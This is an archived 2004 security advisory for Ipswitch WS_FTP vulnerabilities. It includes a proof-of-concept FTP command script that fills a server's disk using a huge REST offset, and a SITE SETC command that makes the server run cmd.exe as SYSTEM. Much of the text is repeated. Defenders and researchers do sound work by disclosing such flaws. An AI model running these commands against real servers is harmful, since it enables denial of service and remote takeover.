Ipswitch WS_FTP Multiple Vulnerabilities
BID:9953
Info
Ipswitch WS_FTP Multiple Vulnerabilities
| Bugtraq ID: | 9953 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 23 2004 12:00AM |
| Updated: | Mar 23 2004 12:00AM |
| Credit: | Discovery is credited to Hugh Mann <[email protected]>. |
| Vulnerable: |
Ipswitch WS_FTP Pro 8.0 3 Ipswitch WS_FTP Pro 8.0 2 Ipswitch WS_FTP Pro 7.5 Ipswitch WS_FTP Pro 6.0 Ipswitch WS FTP Server 4.0 2 Ipswitch WS FTP Server 4.0 1 Ipswitch WS FTP Server 4.0 Ipswitch WS FTP Server 3.4 Ipswitch WS FTP Server 3.1.3 Ipswitch WS FTP Server 3.1.2 Ipswitch WS FTP Server 3.1.1 Ipswitch WS FTP Server 3.1 Ipswitch WS FTP Server 3.0 1 Ipswitch WS FTP Server 3.0 Ipswitch WS FTP Server 2.0.4 Ipswitch WS FTP Server 2.0.3 Ipswitch WS FTP Server 2.0.2 Ipswitch WS FTP Server 2.0.1 Ipswitch WS FTP Server 2.0 Ipswitch WS FTP Server 1.0.5 Ipswitch WS FTP Server 1.0.4 Ipswitch WS FTP Server 1.0.3 Ipswitch WS FTP Server 1.0.2 Ipswitch WS FTP Server 1.0.1 |
| Not Vulnerable: | |
Discussion
Ipswitch WS_FTP Multiple Vulnerabilities
Multiple vulnerabilities have been identified in the WS_FTP Server and client applications. These vulnerabilities may allow remote attackers to execute arbitrary code, cause denial of service attacks and gain administrative level access to a server.
The issues include two remote buffer overflow vulnerabilities in the client, a denial of service vulnerability in the server and an access validation issue in the server leading to remote command execution with SYSTEM privileges.
These issues are undergoing further analysis. This BID will be divided into separate issues as analysis is completed.
Multiple vulnerabilities have been identified in the WS_FTP Server and client applications. These vulnerabilities may allow remote attackers to execute arbitrary code, cause denial of service attacks and gain administrative level access to a server.
The issues include two remote buffer overflow vulnerabilities in the client, a denial of service vulnerability in the server and an access validation issue in the server leading to remote command execution with SYSTEM privileges.
These issues are undergoing further analysis. This BID will be divided into separate issues as analysis is completed.
Exploit / POC
Ipswitch WS_FTP Multiple Vulnerabilities
The following proof of concept has been provided:
Save this in a file called ftpcmds.txt, after changing the FTP server name,
username, and password.
<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
>>>>>>>>>>>>
Then start it:
C:\>ftp -s:ftpcmds.txt
to see the result. It will create a 1GB file and then delete it.
SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified
The following exploit code has been provided:
The following proof of concept has been provided:
Save this in a file called ftpcmds.txt, after changing the FTP server name,
username, and password.
<<<<<<<<<<<<
open ftp.server.mob
username
password
!echo.>2byte.txt
!echo.>2byte_2.txt
dir
put 2byte_2.txt
dir
del 2byte_2.txt
quote REST 1073741822
put 2byte.txt
dir
put 2byte_2.txt
del 2byte.txt
del 2byte_2.txt
!del 2byte.txt
!del 2byte_2.txt
quit
>>>>>>>>>>>>
Then start it:
C:\>ftp -s:ftpcmds.txt
to see the result. It will create a 1GB file and then delete it.
SITE SETC <HostName><\t>3V1L<\t>cmd.exe<\t>/C echo yup<\t>16
220 site command modified
The following exploit code has been provided:
Solution / Fix
Ipswitch WS_FTP Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Ipswitch WS_FTP Multiple Vulnerabilities
References:
References:
- Ipswitch Homepage (Ipswitch)
- ALLO ALLO WS_FTP Server ("Hugh Mann"
- How to crash a harddisk - the Ipswitch WS_FTP Server way ("Hugh Mann"
- Open the WS_FTP Server backdoor to SYSTEM ("Hugh Mann"
- Think of the buffers! Won't somebody think of the buffers?! ("Hugh Mann"